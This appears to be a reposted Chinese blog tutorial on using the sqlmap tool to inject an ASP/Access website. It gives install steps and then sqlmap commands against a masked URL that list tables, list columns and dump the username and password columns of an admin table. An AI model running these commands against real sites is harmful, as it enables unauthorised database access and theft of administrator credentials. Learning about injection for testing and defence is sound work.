sqlmap注入Access实例
2012-02-14 11:38
197 查看
FROM:暗组
最近学习SQL注入攻击,首先从Access+ASP开始,以前没有发现Linux下有什么针对Access的注入工具,后来才知道原来 SQLMap可以 什么是SQL注入攻击? SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合 法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的 数据,这就是所谓的SQL Injection,即SQL注入。 什么是SQLMap? SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强 大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,对从数据库中提取数据,访问底层的文件系统和操作 系统执行命令的许多利基功能带外连接。 项目网站:http://sqlmap.sourceforge.net/ 支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB 看到了吧,几乎囊括了市面上所有的数据库 下载:http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz 最新版本 0.9 安装 sqlmap使用Python编写,解压之后直接使用 tar zxvf sqlmap-0.9.tar.gz cd sqlmap-0.9/ 运行 python sqlmap.py or chmod +x sqlmap.py ./sqlmap.py 帮助 python sqlmap.py -h 选项比较多 看不下去的童鞋可以先移步这里http://hi.baidu.com/p3rlish/blog ... 6297c736d3cace.html 网上几乎就只能看到帮助、说明的之类的,实例太少了,希望大家都踊跃发言,一起研究。 针对Access数据库一般就只能爆表,爆数据了(为避免不必要的麻烦,URL用www.xxx.com代替,你懂的) ./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --table -u "你要注入的URL" --table 爆表 中间会出来一个让你输入线程的问号 你输入一个数字 5 ==都可以 它就会开始跑表了 跑出来这么几个表,聪明的童鞋一看就知道那个表会有我们想要的东西 6 天前 上传 下载附件(3.08 KB) 下面开始爆指定表的列名,这里爆adminuser ./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --columns -T amdinuser 已经出来了,你可以使用Ctrl+C停止,也可以耐心的再等等 爆数据吧 ./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --dump -T adminuser -C username,password 一会儿结果就出了 文章写的仓促,大家凑合着看吧,欢迎拍砖! |
相关文章推荐
- 使用sqlmap 代替access 注入中转
- 这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)
- 1.羽翼sqlmap学习笔记之Access注入
- dver实例sqlmap进行mysql注入root权限读写文件
- 实例——注入攻击Access
- sqlmap之(三)----Access注入实战
- sqlmap注入Access
- Spring根据XML配置文件 p名称空间注入属性的实例
- access注入思路
- 『安全工具』注入神器SQLMAP
- Spring源码追踪1——doGetBean(为什么org.springframework.data.redis.core.RedisTemplate的实例可以注入为ListOperations)
- Access注入
- Access使用宏控制程序--1.5.一个宏的实例――检验口令
- Bean作用域的配置以及 Spring各种注入方式实例 list set map props
- 【FastDev4Android框架开发】RecyclerView完全解析之结合AA(Android Annotations)注入框架实例(三十)
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT
- 对Spring中接口注入的理解实例分析
- 利用反射实现简单的Spring注解注入实例
- Sqlmap注入技巧收集整理